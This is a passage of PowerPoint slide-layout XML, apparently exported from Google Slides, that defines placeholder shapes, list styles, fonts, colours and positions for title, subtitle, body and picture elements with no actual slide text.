          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;53;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="14" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800194" y="1315671"/>
            <a:ext cx="1531200" cy="798900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54" name="Google Shape;54;p5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="758040"/>
            <a:ext cx="8511900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="21425">
            <a:solidFill>
              <a:srgbClr val="B9D8EB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Google Shape;55;p5"/>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a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>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Red Background_Content" type="titleOnly">
  <p:cSld name="TITLE_ONLY">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="000D74"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="56" name="Shape 56"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57" name="Google Shape;57;p6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="5539" r="5548" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4044469" y="1029928"/>
            <a:ext cx="4527598" cy="3394705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Google Shape;58;p6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624694" y="1029938"/>
            <a:ext cx="3419700" cy="3394500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>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Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;59;p6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="948506" y="1272829"/>
            <a:ext cx="2850000" cy="462300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Google Shape;60;p6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994631" y="1698131"/>
            <a:ext cx="2757600" cy="2449500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-285750" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="900"/>
              <a:buChar char="—"/>
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-279400" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-279400" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-304800" lvl="5" marL="2743200" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200"/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-304800" lvl="6" marL="3200400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200"/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-304800" lvl="7" marL="3657600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200"/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-304800" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Google Shape;61;p6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
